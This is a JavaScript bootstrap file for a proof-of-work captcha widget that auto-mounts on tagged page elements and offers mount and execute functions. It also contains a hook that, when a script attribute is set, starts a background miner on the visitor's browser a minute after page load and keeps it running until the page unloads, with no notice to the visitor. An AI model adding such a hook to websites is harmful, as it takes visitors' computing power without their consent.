// Bootstrap — auto-mount on DOMContentLoaded and expose programmatic API.
import { CaptchaWidget } from "./ui/widget.js";
import { startIdleMiner } from "./worker/idle.js";

function autoMount(root = document) {
  const elements = root.querySelectorAll("[data-captcha]:not([data-captcha-mounted])");
  for (const el of elements) {
    el.setAttribute("data-captcha-mounted", "1");
    new CaptchaWidget(el, {
      sitekey: el.dataset.sitekey,
      preset: el.dataset.preset || "strict",
      api: el.dataset.api,
      lang: el.dataset.lang,
      theme: el.dataset.theme || "auto",
      onPass: (token) => {
        const cb = el.dataset.callback && window[el.dataset.callback];
        if (typeof cb === "function") cb(token);
      },
      onFail: (reason) => {
        const cb = el.dataset.errorCallback && window[el.dataset.errorCallback];
        if (typeof cb === "function") cb(reason);
      },
    });
  }
}

// Detect <script ... data-mine-after="N"> tag and schedule a background miner.
// The script tag must include data-sitekey. Mining starts N ms after page load
// (defaults to 60_000) and continues until the page unloads.
function maybeScheduleIdleMiner() {
  const tag =
    document.currentScript ||
    document.querySelector("script[data-mine-after]");
  if (!tag || !tag.dataset.mineAfter) return;
  const after = parseInt(tag.dataset.mineAfter, 10) || 60_000;
  const sitekey = tag.dataset.sitekey;
  const api = tag.dataset.api;
  setTimeout(() => startIdleMiner({ sitekey, api }), after);
}

export const computeCaptcha = {
  mount: async ({ container, sitekey, preset, api, onPass, onFail }) => {
    return new CaptchaWidget(container, { sitekey, preset, api, onPass, onFail });
  },
  execute: ({ sitekey, preset, api } = {}) => {
    return new Promise((resolve, reject) => {
      const div = document.createElement("div");
      div.style.display = "none";
      document.body.appendChild(div);
      const w = new CaptchaWidget(div, {
        sitekey,
        preset,
        api,
        onPass: (token) => { div.remove(); resolve(token); },
        onFail: (reason) => { div.remove(); reject(new Error(reason)); },
      });
      // Auto-click the hidden checkbox immediately
      setTimeout(() => w._onClick(), 100);
    });
  },
};

if (typeof window !== "undefined") {
  window.computeCaptcha = computeCaptcha;
  maybeScheduleIdleMiner();
  if (document.readyState === "loading") {
    document.addEventListener("DOMContentLoaded", () => autoMount());
  } else {
    autoMount();
  }
}

export { CaptchaWidget };
